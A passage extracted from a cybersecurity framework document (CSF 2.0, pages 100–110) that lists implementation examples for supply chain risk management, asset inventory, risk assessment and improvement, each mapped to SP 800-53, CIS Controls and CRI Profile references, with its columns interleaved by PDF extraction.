identify risks the organization faces, SP 800-221A: MA.RM-2
including likelihood and potential impact SP 800-53 Rev 5.1.1: PM-04
Ex3: Collect and communicate metrics on SP 800-53 Rev 5.1.1: PM-06
cybersecurity risk management with senior SP 800-53 Rev 5.1.1: RA-07
leadership SP 800-53 Rev 5.1.1: SR-06
CRI Profile v2.0: GV.SC

CSF v1.1: ID.SC
SP 800-221A: GV.OV-4

Ex1: Establish a strategy that expresses the CIS Controls v8.0: 15.2
objectives of the cybersecurity supply chain CRI Profile v2.0: GV.SC-01
risk management program CRI Profile v2.0: GV.SC-01.01
Ex2: Develop the cybersecurity supply chain CRI Profile v2.0: GV.SC-01.02
risk management program, including a plan CSF v1.1: ID.SC-1
(with milestones), policies, and procedures SP 800-221A: GV.PO-1
that guide implementation and SP 800-53 Rev 5.1.1: PM-30
improvement of the program, and share SP 800-53 Rev 5.1.1: SR-02
the policies and procedures with the SP 800-53 Rev 5.1.1: SR-03
organizational stakeholders
Ex3: Develop and implement program
processes based on the strategy, objectives,
policies, and procedures that are agreed
upon and performed by the organizational
stakeholders
Ex4: Establish a cross-organizational
mechanism that ensures alignment
between functions that contribute to
cybersecurity supply chain risk
management, such as cybersecurity, IT,
operations, legal, human resources, and
engineering

Ex1: Identify one or more specific roles or CIS Controls v8.0: 15.4
positions that will be responsible and CRI Profile v2.0: GV.SC-02
accountable for planning, resourcing, and CRI Profile v2.0: GV.SC-02.01
executing cybersecurity supply chain risk CSF v1.1: ID.AM-6
management activities SP 800-218: PO.2.1
Ex2: Document cybersecurity supply chain SP 800-221A: GV.RR-1
risk management roles and responsibilities SP 800-221A: GV.RR-2
in policy SP 800-53 Rev 5.1.1: SR-02
Ex3: Create responsibility matrixes to SP 800-53 Rev 5.1.1: SR-03
document who will be responsible and SP 800-53 Rev 5.1.1: SR-05
accountable for cybersecurity supply chain
risk management activities and how those
teams and individuals will be consulted and
informed
Ex4: Include cybersecurity supply chain risk
management responsibilities and
performance requirements in personnel
descriptions to ensure clarity and improve
accountability
Ex5: Document performance goals for
personnel with cybersecurity risk
management-specific responsibilities, and
periodically measure them to demonstrate
and improve performance
Ex6: Develop roles and responsibilities for
suppliers, customers, and business partners
to address shared responsibilities for
applicable cybersecurity risks, and integrate
them into organizational policies and
applicable third-party agreements
Ex7: Internally communicate cybersecurity
supply chain risk management roles and
responsibilities for third parties
Ex8: Establish rules and protocols for
information sharing and reporting
processes between the organization and its
suppliers

Ex1: Identify areas of alignment and overlap CRI Profile v2.0: GV.SC-03
with cybersecurity and enterprise risk CRI Profile v2.0: GV.SC-03.01
management CSF v1.1: ID.SC-2
Ex2: Establish integrated control sets for SP 800-218: PW.4.1
cybersecurity risk management and SP 800-221A: GV.CT-2
cybersecurity supply chain risk SP 800-221A: GV.CT-3
management SP 800-53 Rev 5.1.1: AC-01
Ex3: Integrate cybersecurity supply chain SP 800-53 Rev 5.1.1: AT-01
risk management into improvement SP 800-53 Rev 5.1.1: AU-01
processes SP 800-53 Rev 5.1.1: CA-01
Ex4: Escalate material cybersecurity risks in SP 800-53 Rev 5.1.1: CM-01
supply chains to senior management, and SP 800-53 Rev 5.1.1: CP-01
address them at the enterprise risk SP 800-53 Rev 5.1.1: IA-01
management level SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: PM-09
SP 800-53 Rev 5.1.1: PM-18
SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: PM-31
SP 800-53 Rev 5.1.1: SR-02
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-07

Ex1: Develop criteria for supplier criticality CIS Controls v8.0: 15.1
based on, for example, the sensitivity of CIS Controls v8.0: 15.3
data processed or possessed by suppliers, CRI Profile v2.0: GV.SC-04
the degree of access to the organization's CRI Profile v2.0: GV.SC-04.01
systems, and the importance of the CSF v1.1: ID.SC-2
products or services to the organization's SP 800-221A: GV.CT-2
mission SP 800-221A: GV.CT-3
Ex2: Keep a record of all suppliers, and SP 800-53 Rev 5.1.1: RA-09
prioritize suppliers based on the criticality SP 800-53 Rev 5.1.1: SA-09
criteria SP 800-53 Rev 5.1.1: SR-06

Ex1: Establish security requirements for CIS Controls v8.0: 15.4
suppliers, products, and services CRI Profile v2.0: EX.CN
commensurate with their criticality level CRI Profile v2.0: EX.CN-01
and potential impact if compromised CRI Profile v2.0: EX.CN-02
Ex2: Include all cybersecurity and supply CRI Profile v2.0: EX.CN-01.01
chain requirements that third parties must CRI Profile v2.0: EX.CN-01.02
follow and how compliance with the CRI Profile v2.0: EX.CN-01.03
requirements may be verified in default CRI Profile v2.0: EX.CN-02.01
contractual language CRI Profile v2.0: EX.CN-02.02
Ex3: Define the rules and protocols for CRI Profile v2.0: EX.CN-02.03
information sharing between the CRI Profile v2.0: EX.CN-02.04
organization and its suppliers and sub-tier CSF v1.1: ID.SC-3
suppliers in agreements SP 800-218: PO.1.3
Ex4: Manage risk by including security SP 800-53 Rev 5.1.1: SA-04
requirements in agreements based on their SP 800-53 Rev 5.1.1: SA-09
criticality and potential impact if SP 800-53 Rev 5.1.1: SR-03
compromised SP 800-53 Rev 5.1.1: SR-05
Ex5: Define security requirements in SP 800-53 Rev 5.1.1: SR-06
service-level agreements (SLAs) for SP 800-53 Rev 5.1.1: SR-10
monitoring suppliers for acceptable security
performance throughout the supplier
relationship lifecycle
Ex6: Contractually require suppliers to
disclose cybersecurity features, functions,
and vulnerabilities of their products and
services for the life of the product or the
term of service
provide and maintain a current component
inventory (e.g., software or hardware bill of
materials) for critical products
Ex8: Contractually require suppliers to vet
their employees and guard against insider
threats
provide evidence of performing acceptable
security practices through, for example,

Ex1: Perform thorough due diligence on CIS Controls v8.0: 15.5
prospective suppliers that is consistent with CRI Profile v2.0: EX.DD
procurement planning and commensurate CRI Profile v2.0: EX.DD-01
with the level of risk, criticality, and CRI Profile v2.0: EX.DD-02
complexity of each supplier relationship CRI Profile v2.0: EX.DD-01.01
Ex2: Assess the suitability of the technology CRI Profile v2.0: EX.DD-01.02
and cybersecurity capabilities and the risk CRI Profile v2.0: EX.DD-01.03
management practices of prospective CRI Profile v2.0: EX.DD-02.01
suppliers CRI Profile v2.0: EX.DD-02.02
Ex3: Conduct supplier risk assessments CRI Profile v2.0: EX.DD-02.03
against business and applicable CRI Profile v2.0: EX.DD-02.04
cybersecurity requirements CSF v1.1: ID.SC-1
Ex4: Assess the authenticity, integrity, and SP 800-221A: GV.PO-1
security of critical products prior to SP 800-53 Rev 5.1.1: SA-04
acquisition and use SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06

Ex1: Adjust assessment formats and CIS Controls v8.0: 15.6
frequencies based on the third party's CRI Profile v2.0: EX.MM
reputation and the criticality of the CRI Profile v2.0: EX.MM-01
products or services they provide CRI Profile v2.0: EX.MM-02
Ex2: Evaluate third parties' evidence of CRI Profile v2.0: EX.MM-01.01
compliance with contractual cybersecurity CRI Profile v2.0: EX.MM-01.02
requirements, such as self-attestations, CRI Profile v2.0: EX.MM-01.03
warranties, certifications, and other CRI Profile v2.0: EX.MM-01.04
artifacts CRI Profile v2.0: EX.MM-01.05
Ex3: Monitor critical suppliers to ensure CRI Profile v2.0: EX.MM-01.06
that they are fulfilling their security CRI Profile v2.0: EX.MM-02.01
obligations throughout the supplier CRI Profile v2.0: EX.MM-02.02
relationship lifecycle using a variety of CRI Profile v2.0: EX.MM-02.03
methods and techniques, such as CSF v1.1: ID.SC-2
inspections, audits, tests, or other forms of CSF v1.1: ID.SC-4
evaluation SP 800-218: PW.4.1
Ex4: Monitor critical suppliers, services, and SP 800-218: PW.4.4
products for changes to their risk profiles, SP 800-221A: GV.CT-2
and reevaluate supplier criticality and risk SP 800-221A: GV.CT-3
impact accordingly SP 800-221A: MA.RM-2
Ex5: Plan for unexpected supplier and SP 800-221A: MA.RM-3
supply chain-related interruptions to ensure SP 800-53 Rev 5.1.1: RA-09
business continuity SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-09
SP 800-53 Rev 5.1.1: SR-03
SP 800-53 Rev 5.1.1: SR-06

Ex1: Define and use rules and protocols for CIS Controls v8.0: 15.4
reporting incident response and recovery CRI Profile v2.0: GV.SC-08
activities and the status between the CRI Profile v2.0: GV.SC-08.01
organization and its suppliers CSF v1.1: ID.SC-5
Ex2: Identify and document the roles and SP 800-221A: GV.CT-3
responsibilities of the organization and its SP 800-53 Rev 5.1.1: SA-04
suppliers for incident response SP 800-53 Rev 5.1.1: SA-09
Ex3: Include critical suppliers in incident SP 800-53 Rev 5.1.1: SR-02
response exercises and simulations SP 800-53 Rev 5.1.1: SR-03
Ex4: Define and coordinate crisis SP 800-53 Rev 5.1.1: SR-08
communication methods and protocols SP 800-53 Rev 5.1.1: CP-01
between the organization and its critical SP 800-53 Rev 5.1.1: IR-01
suppliers
Ex5: Conduct collaborative lessons learned
sessions with critical suppliers

Ex1: Policies and procedures require CIS Controls v8.0: 15.6
provenance records for all acquired CRI Profile v2.0: GV.SC-09
technology products and services CRI Profile v2.0: GV.SC-09.01
Ex2: Periodically provide risk reporting to CSF v1.1: ID.SC-1
leaders about how acquired components SP 800-221A: GV.PO-1
are proven to be untampered and authentic SP 800-53 Rev 5.1.1: PM-09
Ex3: Communicate regularly among SP 800-53 Rev 5.1.1: PM-19
cybersecurity risk managers and operations SP 800-53 Rev 5.1.1: PM-28
personnel about the need to acquire SP 800-53 Rev 5.1.1: PM-30
software patches, updates, and upgrades SP 800-53 Rev 5.1.1: PM-31
only from authenticated and trustworthy SP 800-53 Rev 5.1.1: RA-03
software providers SP 800-53 Rev 5.1.1: RA-07
Ex4: Review policies to ensure that they SP 800-53 Rev 5.1.1: SA-04
require approved supplier personnel to SP 800-53 Rev 5.1.1: SA-09
perform maintenance on supplier products SP 800-53 Rev 5.1.1: SR-02
Ex5: Policies and procedure require SP 800-53 Rev 5.1.1: SR-03
checking upgrades to critical hardware for SP 800-53 Rev 5.1.1: SR-05
unauthorized changes SP 800-53 Rev 5.1.1: SR-06

Ex1: Establish processes for terminating CIS Controls v8.0: 15.7
critical relationships under both normal and CRI Profile v2.0: EX.TR
adverse circumstances CRI Profile v2.0: EX.TR-01
Ex2: Define and implement plans for CRI Profile v2.0: EX.TR-02
component end-of-life maintenance CRI Profile v2.0: EX.TR-01.01
support and obsolescence CRI Profile v2.0: EX.TR-01.02
Ex3: Verify that supplier access to CRI Profile v2.0: EX.TR-01.03
organization resources is deactivated CRI Profile v2.0: EX.TR-02.01
promptly when it is no longer needed CSF v1.1: ID.SC-1
Ex4: Verify that assets containing the SP 800-221A: GV.PO-1
organization's data are returned or properly SP 800-53 Rev 5.1.1: PM-31
disposed of in a timely, controlled, and safe SP 800-53 Rev 5.1.1: RA-03
manner SP 800-53 Rev 5.1.1: RA-05
Ex5: Develop and execute a plan for SP 800-53 Rev 5.1.1: RA-07
terminating or transitioning supplier SP 800-53 Rev 5.1.1: SA-04
relationships that takes supply chain SP 800-53 Rev 5.1.1: SA-09
security risk and resiliency into account SP 800-53 Rev 5.1.1: SR-02
Ex6: Mitigate risks to data and systems SP 800-53 Rev 5.1.1: SR-03
created by supplier termination SP 800-53 Rev 5.1.1: SR-05
Ex7: Manage data leakage risks associated SP 800-53 Rev 5.1.1: SR-06
with supplier termination
CRI Profile v2.0: ID

CSF v1.1: ID

CRI Profile v2.0: ID.AM
CSF v1.1: ID.AM
SP 800-221A: MA.RI-1
Ex1: Maintain inventories for all types of CIS Controls v8.0: 1.1
hardware, including IT, IoT, OT, and mobile CRI Profile v2.0: ID.AM-01
devices CRI Profile v2.0: ID.AM-01.01
Ex2: Constantly monitor networks to detect CSF v1.1: ID.AM-1
new hardware and automatically update SP 800-221A: MA.RI-1
inventories SP 800-53 Rev 5.1.1: CM-08
SP 800-53 Rev 5.1.1: PM-05
Ex1: Maintain inventories for all types of CIS Controls v8.0: 2.1
software and services, including CRI Profile v2.0: ID.AM-02
commercial-off-the-shelf, open-source, CRI Profile v2.0: ID.AM-02.01
custom applications, API services, and CSF v1.1: ID.AM-2
cloud-based applications and services SP 800-221A: MA.RI-1
Ex2: Constantly monitor all platforms, SP 800-53 Rev 5.1.1: AC-20
including containers and virtual machines, SP 800-53 Rev 5.1.1: CM-08
for software and service inventory changes SP 800-53 Rev 5.1.1: PM-05
Ex3: Maintain an inventory of the SP 800-53 Rev 5.1.1: SA-05
organization's systems SP 800-53 Rev 5.1.1: SA-09

Ex1: Maintain baselines of communication CIS Controls v8.0: 3.8
and data flows within the organization's CRI Profile v2.0: ID.AM-03
wired and wireless networks CRI Profile v2.0: ID.AM-03.01
Ex2: Maintain baselines of communication CSF v1.1: ID.AM-3
and data flows between the organization CSF v1.1: DE.AE-1
and third parties SP 800-53 Rev 5.1.1: AC-04
Ex3: Maintain baselines of communication SP 800-53 Rev 5.1.1: CA-03
and data flows for the organization's SP 800-53 Rev 5.1.1: CA-09
infrastructure-as-a-service (IaaS) usage SP 800-53 Rev 5.1.1: PL-02
Ex4: Maintain documentation of expected SP 800-53 Rev 5.1.1: PL-08
network ports, protocols, and services that SP 800-53 Rev 5.1.1: PM-07
are typically used among authorized
systems
Ex1: Inventory all external services used by CIS Controls v8.0: 15.1
the organization, including third-party CRI Profile v2.0: ID.AM-04
infrastructure-as-a-service (IaaS), platform- CRI Profile v2.0: ID.AM-04.01
as-a-service (PaaS), and software-as-a- CSF v1.1: ID.AM-4
service (SaaS) offerings; APIs; and other SP 800-53 Rev 5.1.1: AC-20
externally hosted application services SP 800-53 Rev 5.1.1: SA-09
Ex2: Update the inventory when a new SP 800-53 Rev 5.1.1: SR-02
external service is going to be utilized to
ensure adequate cybersecurity risk
management monitoring of the
organization's use of that service
CSF 2.0 Page 100 of 145

Ex1: Define criteria for prioritizing each CIS Controls v8.0: 3.7
class of assets CRI Profile v2.0: ID.AM-05
Ex2: Apply the prioritization criteria to CRI Profile v2.0: ID.AM-05.01
assets CRI Profile v2.0: ID.AM-05.02
Ex3: Track the asset priorities and update CSF v1.1: ID.AM-5
them periodically or when significant SP 800-221A: MA.RI-1
changes to the organization occur SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-09
SP 800-53 Rev 5.1.1: RA-02
Ex1: Maintain a list of the designated data CIS Controls v8.0: 3.2
types of interest (e.g., personally CRI Profile v2.0: ID.AM-07
identifiable information, protected health CRI Profile v2.0: ID.AM-07.01
information, financial account numbers, SP 800-221A: MA.RI-1
organization intellectual property, SP 800-53 Rev 5.1.1: CM-12
operational technology data) SP 800-53 Rev 5.1.1: CM-13
Ex2: Continuously discover and analyze ad SP 800-53 Rev 5.1.1: SI-12
hoc data to identify new instances of
designated data types
Ex3: Assign data classifications to
designated data types through tags or
labels
Ex4: Track the provenance, data owner, and
geolocation of each instance of designated
data types
CSF 2.0 Page 101 of 145

Ex1: Integrate cybersecurity considerations CIS Controls v8.0: 1.1
throughout the life cycles of systems, CIS Controls v8.0: 3.5
hardware, software, and services CRI Profile v2.0: ID.AM-08
Ex2: Integrate cybersecurity considerations CRI Profile v2.0: ID.AM-08.01
into product life cycles CRI Profile v2.0: ID.AM-08.02
Ex3: Identify unofficial uses of technology CRI Profile v2.0: ID.AM-08.03
to meet mission objectives (i.e., shadow IT) CRI Profile v2.0: ID.AM-08.04
Ex4: Periodically identify redundant CRI Profile v2.0: ID.AM-08.05
systems, hardware, software, and services CRI Profile v2.0: ID.AM-08.06
that unnecessarily increase the CSF v1.1: PR.DS-3
organization's attack surface CSF v1.1: PR.IP-2
Ex5: Properly configure and secure systems, CSF v1.1: PR.MA-1
hardware, software, and services prior to CSF v1.1: PR.MA-2
their deployment in production CSF v1.1: PR.IP-6
Ex6: Update inventories when systems, CSF v1.1: PR.DS
hardware, software, and services are SP 800-218: PW.4.1
moved or transferred within the SP 800-218: PW.4.4
organization SP 800-221A: MA.RI-1
Ex7: Securely destroy stored data based on SP 800-53 Rev 5.1.1: CM-09
the organization's data retention policy SP 800-53 Rev 5.1.1: CM-13
using the prescribed destruction method, SP 800-53 Rev 5.1.1: MA-02
and keep and manage a record of the SP 800-53 Rev 5.1.1: MA-06
destructions SP 800-53 Rev 5.1.1: PL-02
Ex8: Securely sanitize data storage when SP 800-53 Rev 5.1.1: PM-22
hardware is being retired, decommissioned, SP 800-53 Rev 5.1.1: PM-23
reassigned, or sent for repairs or SP 800-53 Rev 5.1.1: SA-03
replacement SP 800-53 Rev 5.1.1: SA-04
Ex9: Offer methods for destroying paper, SP 800-53 Rev 5.1.1: SA-08
storage media, and other physical forms of SP 800-53 Rev 5.1.1: SA-22
data storage SP 800-53 Rev 5.1.1: SI-12
SP 800-53 Rev 5.1.1: SI-18
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-12
CRI Profile v2.0: ID.RA

CSF v1.1: ID.RA
SP 800-221A: GV.BE-4
CSF 2.0 Page 102 of 145

Ex1: Use vulnerability management CIS Controls v8.0: 7.1
technologies to identify unpatched and CRI Profile v2.0: ID.RA-01
misconfigured software CRI Profile v2.0: ID.RA-01.01
Ex2: Assess network and system CRI Profile v2.0: ID.RA-01.02
architectures for design and CRI Profile v2.0: ID.RA-01.03
implementation weaknesses that affect CSF v1.1: ID.RA-1
cybersecurity CSF v1.1: PR.IP-12
Ex3: Review, analyze, or test organization- CSF v1.1: DE.CM-8
developed software to identify design, SP 800-218: PO.5.2
coding, and default configuration SP 800-221A: MA.RI-3
vulnerabilities SP 800-53 Rev 5.1.1: CA-02
Ex4: Assess facilities that house critical SP 800-53 Rev 5.1.1: CA-07
computing assets for physical vulnerabilities SP 800-53 Rev 5.1.1: CA-08
and resilience issues SP 800-53 Rev 5.1.1: RA-03
Ex5: Monitor sources of cyber threat SP 800-53 Rev 5.1.1: RA-05
intelligence for information on new SP 800-53 Rev 5.1.1: SA-11(02)
vulnerabilities in products and services SP 800-53 Rev 5.1.1: SA-15(07)
Ex6: Review processes and procedures for SP 800-53 Rev 5.1.1: SA-15(08)
weaknesses that could be exploited to SP 800-53 Rev 5.1.1: SI-04
affect cybersecurity SP 800-53 Rev 5.1.1: SI-05
Ex1: Configure cybersecurity tools and CRI Profile v2.0: ID.RA-02

technologies with detection or response CRI Profile v2.0: ID.RA-02.01
capabilities to securely ingest cyber threat CRI Profile v2.0: ID.RA-02.02
intelligence feeds CSF v1.1: ID.RA-2
Ex2: Receive and review advisories from SP 800-221A: GV.BE-4
reputable third parties on current threat SP 800-53 Rev 5.1.1: SI-05
actors and their tactics, techniques, and SP 800-53 Rev 5.1.1: PM-15
procedures (TTPs) SP 800-53 Rev 5.1.1: PM-16
Ex3: Monitor sources of cyber threat
intelligence for information on the types of
vulnerabilities that emerging technologies
may have
CSF 2.0 Page 103 of 145

Ex1: Use cyber threat intelligence to CRI Profile v2.0: ID.RA-03
maintain awareness of the types of threat CRI Profile v2.0: ID.RA-03.01
actors likely to target the organization and CRI Profile v2.0: ID.RA-03.02
the TTPs they are likely to use CRI Profile v2.0: ID.RA-03.03
Ex2: Perform threat hunting to look for CRI Profile v2.0: ID.RA-03.04
signs of threat actors within the CSF v1.1: ID.RA-3
environment SP 800-221A: MA.RI-2
Ex3: Implement processes for identifying SP 800-53 Rev 5.1.1: PM-12
internal threat actors SP 800-53 Rev 5.1.1: PM-16
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: SI-05
Ex1: Business leaders and cybersecurity risk CRI Profile v2.0: ID.RA-04
management practitioners work together to CRI Profile v2.0: ID.RA-04.01
estimate the likelihood and impact of risk CSF v1.1: ID.RA-4
scenarios and record them in risk registers SP 800-221A: MA.RI-4
Ex2: Enumerate the potential business SP 800-53 Rev 5.1.1: PM-09
impacts of unauthorized access to the SP 800-53 Rev 5.1.1: PM-11
organization's communications, systems, SP 800-53 Rev 5.1.1: RA-02
and data processed in or by those systems SP 800-53 Rev 5.1.1: RA-03
Ex3: Account for the potential impacts of SP 800-53 Rev 5.1.1: RA-08
cascading failures for systems of systems SP 800-53 Rev 5.1.1: RA-09
CSF 2.0 Page 104 of 145

Ex1: Develop threat models to better CRI Profile v2.0: ID.RA-05
understand risks to the data and identify CRI Profile v2.0: ID.RA-05.01
appropriate risk responses CRI Profile v2.0: ID.RA-05.02
Ex2: Prioritize cybersecurity resource CRI Profile v2.0: ID.RA-05.03
allocations and investments based on CRI Profile v2.0: ID.RA-05.04
estimated likelihoods and impacts CSF v1.1: ID.RA-5
SP 800-218: PW.1.1
SP 800-221A: MA.RA-2
SP 800-53 Rev 5.1.1: PM-16
SP 800-53 Rev 5.1.1: RA-02
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-07
Ex1: Apply the vulnerability management CRI Profile v2.0: ID.RA-06

plan's criteria for deciding whether to CRI Profile v2.0: ID.RA-06.01
accept, transfer, mitigate, or avoid risk CRI Profile v2.0: ID.RA-06.02
Ex2: Apply the vulnerability management CRI Profile v2.0: ID.RA-06.03
plan's criteria for selecting compensating CRI Profile v2.0: ID.RA-06.04
controls to mitigate risk CRI Profile v2.0: ID.RA-06.05
Ex3: Track the progress of risk response CRI Profile v2.0: ID.RA-06.06
implementation (e.g., plan of action and CSF v1.1: ID.RA-6
milestones [POA&M], risk register, risk CSF v1.1: RS.MI-3
detail report) SP 800-218: PO.5.2
Ex4: Use risk assessment findings to inform SP 800-221A: MA.RP
risk response decisions and actions SP 800-53 Rev 5.1.1: PM-09
Ex5: Communicate planned risk responses SP 800-53 Rev 5.1.1: PM-18
to affected stakeholders in priority order SP 800-53 Rev 5.1.1: PM-30
SP 800-53 Rev 5.1.1: RA-07
CSF 2.0 Page 105 of 145

Ex1: Implement and follow procedures for CRI Profile v2.0: ID.RA-07
the formal documentation, review, testing, CRI Profile v2.0: ID.RA-07.01
and approval of proposed changes and CRI Profile v2.0: ID.RA-07.02
requested exceptions CRI Profile v2.0: ID.RA-07.03
Ex2: Document the possible risks of making CRI Profile v2.0: ID.RA-07.04
or not making each proposed change, and CRI Profile v2.0: ID.RA-07.05
provide guidance on rolling back changes CSF v1.1: PR.IP-3
Ex3: Document the risks related to each SP 800-218: PO.5.2
requested exception and the plan for SP 800-221A: MA.RI-3
responding to those risks SP 800-53 Rev 5.1.1: CA-07
Ex4: Periodically review risks that were SP 800-53 Rev 5.1.1: CM-03
accepted based upon planned future SP 800-53 Rev 5.1.1: CM-04
actions or milestones
Ex1: Conduct vulnerability information CIS Controls v8.0: 7.2

sharing between the organization and its CRI Profile v2.0: ID.RA-08
suppliers following the rules and protocols CRI Profile v2.0: ID.RA-08.01
defined in contracts CRI Profile v2.0: ID.RA-08.02
Ex2: Assign responsibilities and verify the CSF v1.1: RS.AN-5
execution of procedures for processing, SP 800-221A: MA.RI-3
analyzing the impact of, and responding to SP 800-53 Rev 5.1.1: RA-05
cybersecurity threat, vulnerability, or
incident disclosures by suppliers,
customers, partners, and government
cybersecurity organizations
CSF 2.0 Page 106 of 145

Ex1: Assess the authenticity and CRI Profile v2.0: EX.DD-04
cybersecurity of critical technology CRI Profile v2.0: EX.DD-04.01
products and services prior to acquisition CRI Profile v2.0: EX.DD-04.02
and use CSF v1.1: PR.DS-8
SP 800-218: PO.5.2
SP 800-221A: MA.RI-3
SP 800-53 Rev 5.1.1: SA-04
SP 800-53 Rev 5.1.1: SA-05
SP 800-53 Rev 5.1.1: SA-10
SP 800-53 Rev 5.1.1: SA-11
SP 800-53 Rev 5.1.1: SA-15
SP 800-53 Rev 5.1.1: SA-17
SP 800-53 Rev 5.1.1: SI-07
SP 800-53 Rev 5.1.1: SR-05
SP 800-53 Rev 5.1.1: SR-06
SP 800-53 Rev 5.1.1: SR-10
SP 800-53 Rev 5.1.1: SR-11
Ex1: Conduct supplier risk assessments CRI Profile v2.0: EX.DD-03

against business and applicable CRI Profile v2.0: EX.DD-03.01
cybersecurity requirements, including the CRI Profile v2.0: EX.DD-03.02
supply chain CRI Profile v2.0: EX.DD-03.03
CSF v1.1: ID.SC-2
CSF v1.1: ID.SC-4
SP 800-221A: GV.CT-2
SP 800-221A: GV.CT-3
SP 800-221A: MA.RM-2
SP 800-221A: MA.RM-3
SP 800-53 Rev 5.1.1: SR-06
CSF 2.0 Page 107 of 145

CRI Profile v2.0: ID.IM
CSF v1.1: RS.IM
CSF v1.1: RC.IM
CSF v1.1: PR.IP-7
CSF v1.1: DE.DP-5
SP 800-221A: MA.IM-1
SP 800-221A: MA.IM-1
CSF 2.0 Page 108 of 145

Ex1: Perform self-assessments of critical CRI Profile v2.0: ID.IM-01
services that take current threats and TTPs CRI Profile v2.0: ID.IM-01.01
into consideration CRI Profile v2.0: ID.IM-01.02
Ex2: Invest in third-party assessments or CRI Profile v2.0: ID.IM-01.03
independent audits of the effectiveness of CRI Profile v2.0: ID.IM-01.04
the organization's cybersecurity program to CRI Profile v2.0: ID.IM-01.05
identify areas that need improvement SP 800-53 Rev 5.1.1: AC-01
Ex3: Constantly evaluate compliance with SP 800-53 Rev 5.1.1: AT-01
selected cybersecurity requirements SP 800-53 Rev 5.1.1: AU-01
through automated means SP 800-53 Rev 5.1.1: CA-01
SP 800-53 Rev 5.1.1: CM-01
SP 800-53 Rev 5.1.1: CP-01
SP 800-53 Rev 5.1.1: IA-01
SP 800-53 Rev 5.1.1: IR-01
SP 800-53 Rev 5.1.1: MA-01
SP 800-53 Rev 5.1.1: MP-01
SP 800-53 Rev 5.1.1: PE-01
SP 800-53 Rev 5.1.1: PL-01
SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: CA-02
SP 800-53 Rev 5.1.1: CA-05
SP 800-53 Rev 5.1.1: CA-07
SP 800-53 Rev 5.1.1: CA-08
SP 800-53 Rev 5.1.1: CP-02
SP 800-53 Rev 5.1.1: IR-04
SP 800-53 Rev 5.1.1: IR-08
SP 800-53 Rev 5.1.1: PL-02
SP 800-53 Rev 5.1.1: RA-03
SP 800-53 Rev 5.1.1: RA-05
SP 800-53 Rev 5.1.1: RA-07
CSF 2.0 Page 109 of 145

Ex1: Identify improvements for future CIS Controls v8.0: 17.7
incident response activities based on CRI Profile v2.0: ID.IM-02
findings from incident response CRI Profile v2.0: ID.IM-02.01
assessments (e.g., tabletop exercises and CRI Profile v2.0: ID.IM-02.02
simulations, tests, internal reviews, CRI Profile v2.0: ID.IM-02.03
independent audits) CRI Profile v2.0: ID.IM-02.04
Ex2: Identify improvements for future CRI Profile v2.0: ID.IM-02.05
business continuity, disaster recovery, and CRI Profile v2.0: ID.IM-02.06
incident response activities based on CRI Profile v2.0: ID.IM-02.07
exercises performed in coordination with CRI Profile v2.0: ID.IM-02.08
critical service providers and product CRI Profile v2.0: ID.IM-02.09
suppliers CSF v1.1: ID.SC-5
Ex3: Involve internal stakeholders (e.g., CSF v1.1: PR.IP-10
senior executives, legal department, HR) in CSF v1.1: DE.DP-3
security tests and exercises as appropriate SP 800-221A: GV.CT-3
Ex4: Perform penetration testing to identify SP 800-53 Rev 5.1.1: AC-01
opportunities to improve the security SP 800-53 Rev 5.1.1: AT-01
posture of selected high-risk systems as SP 800-53 Rev 5.1.1: AU-01
approved by leadership SP 800-53 Rev 5.1.1: CA-01
Ex5: Exercise contingency plans for SP 800-53 Rev 5.1.1: CM-01
responding to and recovering from the SP 800-53 Rev 5.1.1: CP-01
discovery that products or services did not SP 800-53 Rev 5.1.1: IA-01
originate with the contracted supplier or SP 800-53 Rev 5.1.1: IR-01
partner or were altered before receipt SP 800-53 Rev 5.1.1: MA-01
Ex6: Collect and analyze performance SP 800-53 Rev 5.1.1: MP-01
metrics using security tools and services to SP 800-53 Rev 5.1.1: PE-01
inform improvements to the cybersecurity SP 800-53 Rev 5.1.1: PL-01
program SP 800-53 Rev 5.1.1: PM-01
SP 800-53 Rev 5.1.1: PS-01
SP 800-53 Rev 5.1.1: PT-01
SP 800-53 Rev 5.1.1: RA-01
SP 800-53 Rev 5.1.1: SA-01
SP 800-53 Rev 5.1.1: SC-01
SP 800-53 Rev 5.1.1: SI-01
SP 800-53 Rev 5.1.1: SR-01
SP 800-53 Rev 5.1.1: CA-02
SP 800-53 Rev 5.1.1: CA-05
CSF 2.0 Page 110 of 145

Ex1: Conduct collaborative lessons learned CRI Profile v2.0: ID.IM-03
sessions with suppliers CRI Profile v2.0: ID.IM-03.01
Ex2: Annually review cybersecurity policies, CRI Profile v2.0: ID.IM-03.02
processes, and procedures to take lessons CSF v1.1: PR.IP-7
learned into account CSF v1.1: PR.IP-8
Ex3: Use metrics to assess operational CSF v1.1: DE.DP-5
cybersecurity performance over time CSF v1.1: RS.IM-1
CSF v1.1: RS.IM-2
CSF v1.1: RC.IM-1
CSF v1.1: RC.IM-2
SP 800-221A: GV.AD-1
SP 800-221A: MA.RM-6
SP 800-221A: MA.IM-1
